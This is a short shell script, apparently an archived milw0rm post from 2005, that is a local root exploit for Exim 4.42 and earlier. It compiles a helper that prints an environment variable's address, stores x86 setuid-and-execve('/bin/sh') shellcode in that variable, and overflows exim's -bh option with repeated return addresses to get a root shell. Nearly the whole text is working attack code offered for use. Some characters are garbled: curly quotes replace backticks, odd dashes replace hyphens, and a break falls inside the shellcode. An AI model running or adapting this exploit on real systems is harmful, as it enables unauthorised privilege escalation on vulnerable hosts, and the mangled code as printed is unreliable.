1 #!/bin/sh
2
3 # Local Lame R00T sploit for exim <= 4.42
4 # by Dark Eagle
5 #
6 # My First Coding Release In bash ))
7
8 # Unl0ck Research Team
9 #
10 # More Effective than C−code.
11 #
12 # @env.c content:
13 #
14 ###################################################
15 # #include <stdio.h>
16 # #include <string.h>
17 # int main(int argc, char *argv[])
18 # {
19 # char *addr_ptr;
20 # addr_ptr = getenv(argv[1]);
21 # printf("%s @ %p\n", argv[1], addr_ptr);
22 # return 0;
23 # }
24 ###################################################
25
26 gcc @env.c −o @env
27
28 cp @env /usr/bin
29 cd /usr/exim/bin
30
31 CODE=‘perl −e ’print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
32
\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"’‘;export CODE
33
34 @env CODE
35 echo "So, dude, starting..."
36 echo "NoW Just Type Address Of CODE"
37
38 read ADDRESS
39
40 echo "You are typed: $ADDRESS"
41
42 echo "Leeeeeeeeeeeeet’sssssssssss g000000000000000!!!!!!!!!"
43
44 ./exim −bh ::%A‘perl −e ’print pack(’L’,’$ADDRESS’) x 256’‘
45
46 # milw0rm.com [2005−02−07]
Page 1/1
Exim 4.42 Local Root Exploit
darkeagle
02/07/2005